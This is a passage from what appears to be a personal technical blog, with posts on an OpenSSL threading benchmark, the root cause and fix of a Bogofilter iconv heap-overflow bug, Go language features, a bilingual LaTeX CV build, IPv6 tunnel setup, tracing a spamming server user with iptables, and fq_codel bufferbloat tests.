feeling something was wrong with the code, since I had never seen an
idiom like that. A server that does a little hash calculation with
lots of threads – and the function that computes the hash had a
peculiar feature: Its entire body was wrapped by a mutex lock/unlock
clause of a function-static mutex PTHREAD_MUTEX_INITIALIZER, like
this:
static EVP_MD_CTX mdctx;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned char first = 1;
pthread_mutex_lock(&lock);
if (first) {
    EVP_MD_CTX_init(&mdctx);
    first = 0;
}
/* the actual hash computation using &mdctx */
pthread_mutex_unlock(&lock);
In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.
The computation code inside the function looks roughly like this:
if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||
    !EVP_DigestUpdate(&mdctx, input, inputlen) ||
    !EVP_DigestFinal(&mdctx, hash, &md_len)) {
    ERR_print_errors_fp(stderr);
    exit(-1);
}
This is the typical OpenSSL pattern: You tell it to initialize mdctx to
compute the SHA256 digest, then you “update” the digest (i.e., you
feed it some bytes) and then you tell it to finish, storing the
resulting hash in hash. If any of the functions fails, the OpenSSL
error is printed.
So the lock mutex really only protects the mdctx (short for
‘message digest context’). And my gut feeling was that re-initializing the
context all the time (i.e. copying stuff around) is much cheaper
than synchronizing all the hash operations (i.e., having one stupid
bottleneck).
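The two designs can be put side by side in a short Python sketch using hashlib and threading. It only illustrates the structure (one shared lock around every hash versus a fresh digest state per call); because of CPython's interpreter lock, its timings would not be comparable to the C program's. All names are made up for this example.

```python
import hashlib
import threading

_lock = threading.Lock()  # plays the role of the function-static mutex


def hash_locked(data):
    """Every caller funnels through one lock, as in the code under review."""
    with _lock:
        return hashlib.sha256(data).digest()


def hash_independent(data):
    """Each call sets up its own digest state; no synchronization needed."""
    return hashlib.sha256(data).digest()


def run(func, items, num_threads):
    """Hash all items with num_threads threads; return digests in order."""
    results = [None] * len(items)

    def worker(tid):
        # strided split: thread tid handles items tid, tid + num_threads, ...
        for i in range(tid, len(items), num_threads):
            results[i] = func(items[i])

    threads = [threading.Thread(target=worker, args=(tid,))
               for tid in range(num_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results
```

Both variants return the same digests; they differ only in whether the threads have to wait for each other.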
To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)
First, I have to create a dataset. In order for it to be the same all
the time, I use rand_r() with a hard-coded seed, so that the random
data set is identical across all runs:
#define DATANUM 10000000
#define DATASIZE 16
static char data[DATANUM][DATASIZE];
void init_data(void)
{
    int n, i;
    unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */
    char alpha[] = "abcdefghijklmnopqrstuvwxyz";
    for(n = 0; n < DATANUM; n++)
        for(i = 0; i < DATASIZE; i++)
            data[n][i] = alpha[rand_r(&seedp) % 26];
}
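The same idea, a reproducible pseudo-random data set from a fixed seed, looks like this in Python. It is a sketch with a made-up function signature; the generated strings are not the ones rand_r() would produce, only the principle is the same.

```python
import random
import string


def init_data(num, size, seed=0xdeadbeef):
    """Return num random lowercase strings of length size, fixed by seed."""
    rng = random.Random(seed)  # private generator, unaffected by other code
    return ["".join(rng.choice(string.ascii_lowercase) for _ in range(size))
            for _ in range(num)]


first = init_data(1000, 16)
second = init_data(1000, 16)
print(first == second)  # True: the same seed yields the same data set
```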
Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.
Then I start num threads on equally-sized slices of data while recording and
printing out timing statistics:
void hash_all(int num)
{
    int i;
    pthread_t *t;
    struct fromto *ft;
    struct timespec start, end;
    double delta;
    clock_gettime(CLOCK_MONOTONIC, &start);
    t = malloc(num * sizeof *t);
    for(i = 0; i < num; i++) {
        ft = malloc(sizeof(struct fromto));
        ft->from = i * (DATANUM/num);
        /* the last slice also takes the remainder if DATANUM % num != 0 */
        ft->to = (i == num - 1) ? DATANUM : (i+1) * (DATANUM/num);
        pthread_create(&t[i], NULL, hash_slice, ft);
    }
    for(i = 0; i < num; i++)
        pthread_join(t[i], NULL);
    clock_gettime(CLOCK_MONOTONIC, &end);
    delta = end.tv_sec - start.tv_sec;
    delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;
    printf("%d threads: %lu hashes/s, total = %.3fs\n",
        num, (unsigned long) (DATANUM / delta), delta);
    free(t);
    sleep(1);
}
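Splitting a data set into per-thread slices has one pitfall: with integer division, the slice size times the number of threads can fall short of the total. One way to handle this, sketched in Python with a made-up helper name, is to let the last slice run to the end.

```python
def slices(total, num):
    """Split range(total) into num contiguous (from, to) slices.

    All slices have total // num entries, except the last one, which also
    takes the remainder so that every entry is covered exactly once.
    """
    base = total // num
    return [(i * base, total if i == num - 1 else (i + 1) * base)
            for i in range(num)]


print(slices(10, 3))                # [(0, 3), (3, 6), (6, 10)]
print(slices(10_000_000, 12)[-1])   # (9166663, 10000000)
```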
Each thread runs the hash_slice() function, which linearly iterates
over the slice and calls hash_one(n) for each entry. With
preprocessor macros, I define two versions of this function:
void hash_one(int num)
{
    int i;
    unsigned char hash[EVP_MAX_MD_SIZE];
    unsigned int md_len;
#ifdef LOCK_STATIC_EVP_MD_CTX
    static EVP_MD_CTX mdctx;
    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static unsigned char first = 1;
    pthread_mutex_lock(&lock);
    if (first) {
        EVP_MD_CTX_init(&mdctx);
        first = 0;
    }
#else
    EVP_MD_CTX mdctx;
    EVP_MD_CTX_init(&mdctx);
#endif
    /* the actual hashing from above */
#ifdef LOCK_STATIC_EVP_MD_CTX
    pthread_mutex_unlock(&lock);
#endif
    return;
}
The Makefile produces two binaries:
$ make
gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c
gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c
… and the result is as expected. On my Intel i7-2620M (two cores, four hardware threads):
$ ./speedtest-copied
1 threads: 1999113 hashes/s, total = 5.002s
2 threads: 3443722 hashes/s, total = 2.904s
4 threads: 3709510 hashes/s, total = 2.696s
8 threads: 3665865 hashes/s, total = 2.728s
12 threads: 3650451 hashes/s, total = 2.739s
24 threads: 3642619 hashes/s, total = 2.745s
$ ./speedtest-locked
1 threads: 2013590 hashes/s, total = 4.966s
2 threads: 857542 hashes/s, total = 11.661s
4 threads: 631336 hashes/s, total = 15.839s
8 threads: 932238 hashes/s, total = 10.727s
12 threads: 850431 hashes/s, total = 11.759s
24 threads: 802501 hashes/s, total = 12.461s
And on an Intel Xeon X5650 24 core machine:
$ ./speedtest-copied
1 threads: 1564546 hashes/s, total = 6.392s
2 threads: 1973912 hashes/s, total = 5.066s
4 threads: 3821067 hashes/s, total = 2.617s
8 threads: 5096136 hashes/s, total = 1.962s
12 threads: 5849133 hashes/s, total = 1.710s
24 threads: 7467990 hashes/s, total = 1.339s
$ ./speedtest-locked
1 threads: 1481025 hashes/s, total = 6.752s
2 threads: 701797 hashes/s, total = 14.249s
4 threads: 338231 hashes/s, total = 29.566s
8 threads: 318873 hashes/s, total = 31.360s
12 threads: 402054 hashes/s, total = 24.872s
24 threads: 304193 hashes/s, total = 32.874s
So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: All the mutex waiting slows the program down so much that you’d better only use one thread or else you lose.
Rule of thumb: If you don’t have a good argument for a multithreading application, simply don’t take the extra effort of implementing it in the first place.
In mid-2010 I found a heap corruption in Bogofilter which led to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so a new Bogofilter release came out yesterday, thanks to the maintainers. (Neither of the bugs has much potential for exploitation, for different reasons.)
I want to shed some light on the details about the new CVE-2012-5468 here: It’s a very subtle bug that rises from the error handling of the character set conversion library iconv.
The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:
Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.
The problematic code doesn’t look problematic at first glance. Nor at
second glance. Take a look yourself.
The version here is abridged for brevity: Convert from inbuf to
outbuf, handling possible iconv failures.
count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);
if (count == (size_t)(-1)) {
int err = errno;
switch (err) {
case EILSEQ: /* invalid multibyte sequence */
case EINVAL: /* incomplete multibyte sequence */
if (!replace_nonascii_characters)
*outbuf = *inbuf;
else
*outbuf = '?';
/* update counts and pointers */
inbytesleft -= 1;
outbytesleft -= 1;
inbuf += 1;
outbuf += 1;
break;
case E2BIG: /* output buffer has no more room */
/* TODO: Provide proper handling of E2BIG */
done = true;
break;
default:
break;
}
}
The iconv API is simple and straightforward: You pass a handle
(which among other things contains the source and destination
character set; it is called xd here), and two buffers and modifiable
integers for the input and output, respectively. (Usually, when
transcoding, the function reads one symbol from the source, converts
it to another character set, and then “drains” the input buffer by
decreasing inbytesleft by the number of bytes that made up the
source symbol. Then, the output length is checked, and if the target
symbol fits, it is appended and the outbytesleft integer is
decreased by how much space the symbol used.)
The API function returns -1 in case of an error.
The Bogofilter code contains a copy&paste of the error cases from the iconv(3)
man page. If you read the libiconv source
carefully,
you’ll find that …
/* Case 2: not enough bytes available to detect anything */
errno = EINVAL;
comes before
/* Case 4: k bytes read, making up a wide character */
if (outleft == 0) {
cd->istate = last_istate;
errno = E2BIG;
...
}
So the “certain pathological cases” the SA talks about are met if a
substantially large chunk of data makes iconv return -1, because
this chunk just happens to end in an invalid multibyte sequence.
But at that point you have no guarantee from the library that your
output buffer can take any more bytes. Appending that character or a
? sign causes an out-of-bounds write. (This is really subtle. I
don’t blame anyone for not noticing this, although sanity checks – if
need be via assert(outbytesleft > 0) – are always in order when
you do complicated modify-string-on-copy stuff.) Additionally,
outbytesleft is decremented past zero (it is an unsigned size_t, so it
wraps around to a huge value), and thus even a later
outbytesleft == 0 check will be false.
Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.
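The missing guard can be modelled in a few lines. The following is a Go sketch of the control flow only, not the actual Bogofilter patch: Go slices are bounds-checked anyway, and the names `putReplacement` and `errNoRoom` are invented for this illustration. The point is that the "copy one byte or a ?" branch must check for remaining output space before it writes.

```go
package main

import (
	"errors"
	"fmt"
)

// errNoRoom plays the role of E2BIG in this model.
var errNoRoom = errors.New("output buffer has no more room")

// putReplacement models the EILSEQ/EINVAL branch: it emits one output byte
// for one bad input byte, but only if the output buffer has space left.
// out is the output buffer, used is the number of bytes already written.
func putReplacement(out []byte, used int, in byte, replace bool) (int, error) {
	if used >= len(out) { // the check the original branch was missing
		return used, errNoRoom
	}
	if replace {
		out[used] = '?'
	} else {
		out[used] = in
	}
	return used + 1, nil
}

func main() {
	out := make([]byte, 2)
	used := 0
	for _, b := range []byte{0xC3, 0xE2, 0xF0} {
		var err error
		used, err = putReplacement(out, used, b, true)
		if err != nil {
			fmt.Println("stopped:", err)
			break
		}
	}
	fmt.Printf("%q\n", out[:used])
}
```

With a two-byte buffer and three bad input bytes, the third write is refused instead of landing past the end of the buffer.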
How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.
I’ve been experimenting with the Go Programming Language for the past few days. (Thanks to Jürgen, who held two introduction sessions at work.) I have not dived very deeply into the language, but already I feel it suits me pretty well.
Go is a really clean and simple, yet powerful language. Here’s what I like so far:
Go is statically typed – I believe this catches a lot of the obvious coding errors you make in your day-to-day scripting language.
Variables are declared with :=. As a mathematician, I like this
very much, and it’ll give you errors if you re-declare the same
variable twice.
C without the cruft and overhead – There are real string types.
You can concatenate them on the fly. Most objects can be
stringified. For example, printing a struct with
fmt.Printf("s = %#v", s) will print the struct in key: value
format, in turn stringifying the elements. This makes for easy
debugging.
Slices (somewhat like arrays, but really much more useful) can be
grown dynamically: sl = append(sl, args...) – no more checking and
perhaps re-allocating space for new objects. No more for-loops over
every element: Simply range over it.
You are allowed, even encouraged, to return to the caller variables
that were initialized on the stack. No more return xstrdup(errmsg);.
Oh, and of course: Garbage Collection.
Clean syntax and a strict compiler – Often I have to wade through really bad C code, cursing about mixed tabs, spaces, indentations. Compilation is only possible with tons of warnings.
Not so with Go. The language is a lot like C, but the compiler is strict: You include an unnecessary package? Compilation error. You have an unused variable? Compilation error. You make a computation without assigning (storing) the return value? Compilation error.
What about tabs vs. spaces? Spaces around + signs? Before
parentheses? Alignment of struct fields? – There’s a definite
answer, and
it's called gofmt.
To re-format all Go files, simply use gofmt -w .. I have installed
a simple Git hook to alert me whenever I’m about to commit code
not in accordance with the style guide:
#!/bin/sh
validgo() {
d="$(git show :"$1" | gofmt -d)"
[ -z "$d" ] && return 0
echo "$d"
echo
echo "File $1 contains improper Go syntax;"
echo "please fix with 'gofmt -w $1' before committing!"
return 1
}
git diff --cached --check || exit 1
git diff-index --name-only --diff-filter=ACM HEAD | while read f; do
if [ "${f##*.}" = "go" ]; then
validgo "$f" || exit 1 # exit in subshell!
fi
done || exit 1 # make the hook fail
Easy-to-use concurrency handling – If you’ve ever tried to write a simple multithreaded C application with multiple workers and a master aggregating the workers’ results, you’ll find that’s really painful. In Go, it feels really natural.
You start off goroutines (‘lightweight threads’) with the go
keyword, which is almost like the binary & pattern in your
average shell: The goroutine is dispatched, and the caller proceeds
without waiting for it to return.
These routines (or any other parts of your program, for that matter) should communicate solely using channels. (Read more about them here.) They are a lot like UNIX sockets: You can put stuff in them, and it comes out at the other end; they have a certain buffer size: writing blocks if that’s full, reading if it’s empty; you can close them.
You don’t have to use channels to send data; you can also use them
to synchronize events. For example, if you dispatch a goroutine,
you’re unable to tell when it has finished. But if you want to wait
for it to finish, you could use a channel with a buffer size of 0
(i.e. reading from it will block until someone is writing to it).
Call this channel done and pass it to the goroutine (for example
as a parameter). From the caller’s perspective, you just wait for
something in that channel: <-done. Once the goroutine is finished,
it’ll write some arbitrary data to that channel. If the channel is
of type chan bool, then done <- true will make the caller
unblock, receive the value and continue with code execution.
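Spelled out as a runnable sketch, the done-channel pattern just described might look like this. The function names `worker` and `runAndWait` and the summing workload are made up for the example.

```go
package main

import "fmt"

// worker computes a result and then signals completion on done.
func worker(result *int, done chan<- bool) {
	sum := 0
	for i := 1; i <= 100; i++ {
		sum += i
	}
	*result = sum
	done <- true // blocks until the caller receives
}

// runAndWait starts the worker and waits for its signal.
func runAndWait() int {
	var result int
	done := make(chan bool) // unbuffered, i.e. buffer size 0
	go worker(&result, done)
	<-done // wait here until the goroutine has finished its work
	return result
}

func main() {
	fmt.Println(runAndWait()) // prints 5050
}
```

Because the worker writes its result before sending on the channel, the caller can safely read it after the receive.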
One thing I didn’t get at first was the close/range idiom: If
there’s a finite amount of data that you want to sequentially read
and handle, stopping when there’s no more data left, you can use
this idiom: A function that returns a channel where a goroutine will
write results, eventually closing the channel and thus signalling the
range operator that this was the last result.
func compute(...) (chan T) {
c := make(chan T)
go func() {
defer close(c)
...
}()
return c
}
c := compute(...)
for res := range c {
// do something with res
}
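A concrete, runnable instance of the same idiom, assuming a toy producer called `squares` (my name, chosen for the example):

```go
package main

import "fmt"

// squares returns a channel that delivers 1*1, 2*2, ..., n*n and is then closed.
func squares(n int) <-chan int {
	c := make(chan int)
	go func() {
		defer close(c) // closing ends the consumer's range loop
		for i := 1; i <= n; i++ {
			c <- i * i
		}
	}()
	return c
}

// sum drains the channel until it is closed.
func sum(c <-chan int) int {
	total := 0
	for v := range c {
		total += v
	}
	return total
}

func main() {
	fmt.Println(sum(squares(4))) // prints 30
}
```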
Nice and intuitive code flow – Apart from spawning goroutines
easily, there are some really simple things that make life easier.
Namely, defer statements and multiple return values.
You can declare functions to be called when the function returns
(like closing channel c in the above example). This eliminates the
usual C pattern where you have a label finish with lots of
if(fd != -1) close(fd); cases. In Go, you rather write:
f, err := os.Open(fn)
defer f.Close()
No matter where you actually throw in your return, you are
guaranteed to have the file closed properly after the function has
returned.
Also, you can return multiple values. But you don’t have to
explicitly list them to return them. If you name them during
function declaration: func fn(...) (a, b, c int) { ... } – then
just say return to return the current values of a, b and c.
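For example, a made-up function `stats` with three named results:

```go
package main

import "fmt"

// stats names its results; a bare return hands back their current values.
func stats(xs ...int) (lo, hi, sum int) {
	if len(xs) == 0 {
		return // lo, hi and sum are still zero
	}
	lo, hi = xs[0], xs[0]
	for _, x := range xs {
		if x < lo {
			lo = x
		}
		if x > hi {
			hi = x
		}
		sum += x
	}
	return
}

func main() {
	lo, hi, sum := stats(3, 1, 4)
	fmt.Println(lo, hi, sum) // prints 1 4 8
}
```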
I have not really fully grasped the importance of interfaces, but I guess I’ll come to that in a few days.
So far, there’s one thing I don’t like: The error checking idiom
result, err := function(...)
if err != nil {
// handle error
}
It’s not the multi-value return… I find that much better than the
usual try-catch-blocks. (Quote Rob Pike: “errors are not
exceptional!”) It’s just that I’d like to check for an error, not if
the error is not nothing. From a logician’s point of view it’s the
same. But I believe if you could somehow write if err { ... } the
code would be so much more readable. Why can’t nil be cast to the
Bool type false?
–
Go is really easy to start with. It took me all of one hour to do a simple client-server application that can pass a Go struct using net/rpc.
But I am not really sure yet how well Go scales. That is, how much
parallelisation is actually good. I did a little coding exercise: On
my system, grep is CPU-bound when the relevant files are in the disk
cache. So I thought, maybe I can simply create a multithreaded grep in
Go.
I have a simple version (simple as
in: it emulates fgrep -IR) that uses one goroutine for every file.
The workers themselves are sent over a channel (a “channel of
channels”) so that the order of output files resembles the order of
files checked.
However, my grep is an order of magnitude slower than the real grep. I tried using the profiler, but I haven’t gotten any meaningful results out of it. If you have a clue to that problem, please write me an e-mail!
Today I finally had time to update my Résumé. So I imported an old version in a new Git repo and set out to do it right once and for all:
I settled for moderncv
(see the ‘examples’ subdirectory for some nice examples). It’ll
automatically create the headers, align all the CV items — and does a
pretty good job at providing a simple yet good-looking and versatile
\cventry command.
I’m now keeping a single cv.tex file that will get processed
differently according to which file I want to compile. The Makefile
looks like this:
DEFAULT: cv-en.pdf cv-de.pdf
cv-en.pdf: cv.tex
pdflatex -jobname cv-en cv
cv-de.pdf: cv.tex
pdflatex -jobname cv-de cv
The -jobname argument will influence where the output file will be
saved. Also, it is available from within the LaTeX document as such:
\usepackage{etoolbox}
\usepackage{ifthen}
\newtoggle{de}
\newcommand{\de}[2]{\iftoggle{de}{#1}{#2}}
\ifthenelse{\equal{\detokenize{cv-de}}{\jobname}}{
\toggletrue{de}
}{
\togglefalse{de}
}
So if the job name is cv-de, then the de toggle will be true. With
the little \de helper function, I can now use something like
\title{\de{Lebenslauf}{Résumé}}
or
\cvlistdoubleitem{
\de{Deutsch (Muttersprache)}
{German (native speaker)}
}{
\de{Englisch (fließend)}
{English (fluent)}
}
throughout the document. A simple distrib rule that contains a
scp command to upload the PDFs to a website, and I’m done for today.
Oh, by the way: If you know a company in the Dubai or Abu Dhabi region that might be interested in giving me a two-month internship opportunity — please contact me! CV available on request ;-)
Sooo... I'm finally part of the IPv6 world now, and so is this blog. I've been meaning to do this for a long time now, but ... you know. – I ran into some traps – partly my own fault – so I might just share it for others, too.
First of all, and this got me several times, when testing loosen up
your iptables settings. That especially means setting the right
policies in ip6tables: ip6tables -P INPUT ACCEPT. (I had set the
default policy to DROP before automatically at interface-up time.
It's better safe than sorry. Do you know what services listen on ::
by default?)
I started out using a simple
Teredo tunnel, which
worked well enough. See Bart's article
ipv6 on your desktop in 2
steps. The default
gai.conf, used by the glibc to resolve hosts, will still prefer IPv4
addresses over IPv6 if your only access is a Teredo tunnel. You can
change this by commenting out the default label policies in
/etc/gai.conf, except for the #label 2001:0::/32 7 line. (See
here
for example. The blog post advises to reboot or wait 15 minutes, but
for me it was enough to re-start my browser / newsreader / ...)
So I set up IPv6 on my server. This was rather easy because Hetzner provides native v6. The real work is just re-creating the iptables rules, adding new AAAA records for DNS. Strike that: The real work is teaching all your small tools to accept IPv6-formatted addresses. (Great efforts are underway to modernize many programs. But especially your odd Perl script will simply choke on the new log files. :-P)
I am still not sure how I should use all these addresses. For now I
enabled one "main" IP for the server, 2a01:4f8:150:4022::2. Then I
have one for plenz.com and one for the blog,
ending in leet-speak "blog": 2a01:4f8:150:4022::b109 – Is it
useful to enable one ip for every subdomain and service? It sure seems
nice, but also a big administrative burden...
Living with the Teredo tunnel for some hours, I wanted to do it "the right way", i.e. enabling IPv6 tunneling on my router. Over at HE's Tunnelbroker you'll get your free tunnel, suitable for connecting your home network.
I'm still using an old OpenWRT WhiteRussian setup with 2.4 kernel, but everything works surprisingly well, once I figured out how to do it properly. HE conveniently provides commands to set up the tunnel; however, setting up the tunnel creates a default route that routes packets destined to your prefix across the tunnel. (I don't know why this is the case.) Thus, after establishing the tunnel, I'm doing:
# send traffic destined to my prefix via the LAN bridge br0
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0
Second, I want to automatically update my IPv6 tunnel endpoint
address. HE conveniently provides an IPv4 interface for that. Simply
md5-hash your password via echo -n PASS | md5sum, find out your user
name hash from the login start page (apparently not the md5 hash of
your username :-P) and your tunnel ID. My script looks like this:
root@ndogo:~# cat /etc/ppp/ip-up.d/he-tunnel
#!/bin/sh
set -x
my_ip="$(ip addr show dev ppp0 | grep ' inet ' | awk '{print $2}')"
wget -O /dev/null "http://ipv4.tunnelbroker.net/ipv4_end.php?ipv4b=$my_ip&pass=PWHASH&user_id=UHASH&tunnel_id=TID"
ip tunnel del he-ipv6
ip tunnel add he-ipv6 mode sit remote 216.66.86.114 local $my_ip ttl 255
# watch the MTU!
ip link set dev he-ipv6 mtu 1280
ip link set he-ipv6 up
ip addr add <prefix>::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6 mtu 1280
# fix up the routes
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0 2>/dev/null
Side note: Don't think that scripts under /etc/ppp/ip-up.d would get
executed automatically when the interface comes up. Use something like
this instead:
root@ndogo:~# cat /etc/hotplug.d/iface/20-ipv6
#!/bin/sh
[ "${ACTION:-ifup}" = "ifup" ] && /etc/ppp/ip-up.d/he-tunnel
The connection seemed to work nicely at first. At least, all Google
searches were using IPv6 and were fast at that. However, oftentimes (in
about 80% of cases) establishing a connection via IPv6 was not
working. Pings (and thus traceroutes) showed no network outage or
other delays along the way. However, tcpdump showed wrong checksums
for a lot of TCP packets.
Only today I got an idea why this might be: wrong MTU. So I set the
MTU to 1280 in the HE web interface and on the router, too: ip link
set dev he-ipv6 mtu 1280. Suddenly, all connections work perfectly.
I've been toying around with the privacy extensions, too, but I don't know how to enable the mode "one IP per new service provider". There's some information about the PEs here but for now I have disabled them.
My flatmate's Windows computer and iPhone picked up IPv6 without further configuration.
I'm actually astonished how many web sites are IPv6 ready. So far I like what I'm seeing.
Update: While setting up an AAAA record for the blog, I forgot it had been a wildcard CNAME previously. The blog was not reachable via IPv4 for a day – that was not intended! ;-)
A week ago our server was listed as sending out spam by the CBL, which is part of the XBL which in turn is part of the widely-used Spamhaus ZEN block list. As a practical result, we couldn't send out mail to GMX or Hotmail any more:
<someone@gmx.de>: host mx0.gmx.net[213.165.64.100] said:
550-5.7.1 {mx048} The IP address of the server you are using to connect to GMX is listed in
550-5.7.1 the XBL Blocking List (CBL + NJABL). 550-5.7.1 For additional information, please visit
550-5.7.1 http://www.spamhaus.org/query/bl?ip=176.9.34.52 and
550 5.7.1 ( http://portal.gmx.net/serverrules ) (in reply to RCPT TO command)
The first source we identified was a postfix alias forwarding to a virtual alias domain; however, I had deleted the user in the latter table, such that postfix would return a "user unknown in virtual alias table" error to the sender. But because the sender was localhost, postfix would create a bounce mail. (This is known as Backscatter.)
But one day later, our IP was listed in CBL again. So I started digging deeper. How do you identify who is sending out spam? There are some obvious points to start:
To get a clearer image of what was really happening, I did two things. First, I implemented a very simple "who is doing SMTP" log mechanism using iptables. It went like this:
$ cut -d: -f1 /etc/passwd | while read user; do
echo iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner $user -j LOG --log-prefix \"$user tried SMTP: \" --log-level 6;
done
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner root -j LOG --log-prefix "root tried SMTP: " --log-level 6
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner feh -j LOG --log-prefix "feh tried SMTP: " --log-level 6
...
(To be honest I used a Vim macro to make the list of rules, but that's hard to write down in a blog post.)
Second, I NAT'ed all users except for postfix to a different IP address:
$ iptables -t nat -A POSTROUTING -p tcp --dport 25 -m owner ! --uid-owner postfix -j SNAT --to-source 176.9.247.94
Then, I dumped the SMTP-related TCP flows for that IP address:
$ tcpflow -c 'host 176.9.247.94 and (dst port 25 or src port 25)'
I waited for a short time, and soon another wave of spam was sent out. Now I could clearly identify the user:
Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:44 noam kernel: [5590942.615608] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
But instead of finding an infected web app, I found that the user was
logged in via SSH and was executing sleep 3600 commands. When I
killed the SSH session, the spamming stopped immediately.
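With more than a handful of users, you would not want to eyeball the kernel log. A small Go sketch for tallying the "tried SMTP" lines per user, assuming the log prefix format from the rules above; the function name `countByUser` is made up for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// smtpLine matches the prefix written by the LOG rules, e.g. "pete tried SMTP: ".
var smtpLine = regexp.MustCompile(`(\S+) tried SMTP: `)

// countByUser counts the logged SMTP connection attempts per user name.
func countByUser(log string) map[string]int {
	counts := make(map[string]int)
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		if m := smtpLine.FindStringSubmatch(sc.Text()); m != nil {
			counts[m[1]]++
		}
	}
	return counts
}

func main() {
	log := "Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0\n" +
		"Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0\n"
	fmt.Println(countByUser(log))
}
```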
Since this was not a user I know personally, I don't know what happened. My best guess is an infected Windows computer and an SSH SOCKS forwarding setup that allowed the (Romanian) spammer to tunnel their connections.
One question remains: Are modern spam-drones able to steal WinSCP/PuTTY login credentials from the Registry and use them to silently set up SSH tunnels? Or was this just a case of bad luck?
I'm currently working on a computer science project where we try to understand and possibly research solutions to the bufferbloat phenomenon. We created some simple RRD graphing automatism to better visualize the phenomenon.
In short – and most internet users would say this is perfectly normal behaviour – Bufferbloat describes that with high-speed uploads or downloads, network latency skyrockets. For my home router and a five-megabyte upload, it looks like this:

The grid intervals are in seconds and feature 10 data points corresponding to 10 pings in that second to a server (here 8.8.8.8). Lighter blue means further away from the median, which for clarity is displayed as a black line, too. – Thus you can see that the nearly constant ping time of ~20ms goes up to an unsteady ~140ms during the upload.
In the next-20120524 Kernel tree the codel and fq_codel queuing
disciplines were made available.
The CoDel implementation is based on this month's paper by Kathleen
Nichols and Van Jacobson, which is
definitely worth a read (and features good explanatory diagrams, too).
So I set out to try fq_codel locally first, that is: limiting my
Wifi output rate to the supposed output rate of my cable modem and then
re-do the same upload.
With tc commands, this translates to:
IF=wlan0
tc qdisc del dev $IF root
tc qdisc add dev $IF root handle 1: htb
tc class add dev $IF parent 1: classid 1:1 htb rate 125kbps
tc qdisc add dev $IF parent 1:1 handle 10: fq_codel
tc filter add dev $IF protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:1
And guess what happens? The upload that took 45.7 seconds before now takes 46.9 seconds; but the median ping times are around 30ms as opposed to ~140ms. (Also, consider that the packet loss is down to 0% as opposed to 1.5% before.) So this is really nice:

I hope I can test this with my colleagues using a fresh CeroWRT install next week such that we can control all the parameters and do more accurate measurements.
Update: The default 13 parameter to the root handle HTB qdisc
that was present in the original version of this post is unnecessary
and was thus removed.
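A quick sanity check on the numbers: in tc, the unit kbps means kilobytes per second (kbit would be kilobits), so rate 125kbps is roughly 1 Mbit/s. The sketch below assumes decimal prefixes and takes the "five-megabyte upload" as 5,000,000 bytes; both are assumptions on my part.

```go
package main

import "fmt"

const (
	rateBytesPerSec = 125 * 1000      // tc "125kbps": kilobytes per second
	uploadBytes     = 5 * 1000 * 1000 // the five-megabyte upload (assumed decimal)
)

// minSeconds is the shortest possible transfer time at the shaped rate,
// ignoring protocol overhead.
func minSeconds(size, rate float64) float64 {
	return size / rate
}

func main() {
	fmt.Printf("rate: %d kbit/s\n", rateBytesPerSec*8/1000)
	fmt.Printf("lower bound: %.1f s\n", minSeconds(uploadBytes, rateBytesPerSec))
}
```

This gives a lower bound of 40 seconds, so the measured 45.7 and 46.9 seconds are in a plausible range once protocol overhead is added.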
I have a pair of new monitors (Dell U2312HM, find them here). I used to have one somewhat cheap 18.5" widescreen with 1366x768 (which is the same resolution as my Thinkpad X220), but reading long texts or working long hours really tired my eyes a lot.
The new screens have nice 23" IPS panels with great viewing angles. But most important of all, I can adjust the height of the screens and rotate them. Now my desk looks like this:
The X220 can only have two monitors connected at once. Also, the Docking Station's DVI output is single link. Thus, I connect one of the monitors via VGA and the other via DVI.
I use a simple shell script that is invoked when I press Fn+F7. Note that you have to turn off the LVDS1 internal display first before you can activate the two screens at once.
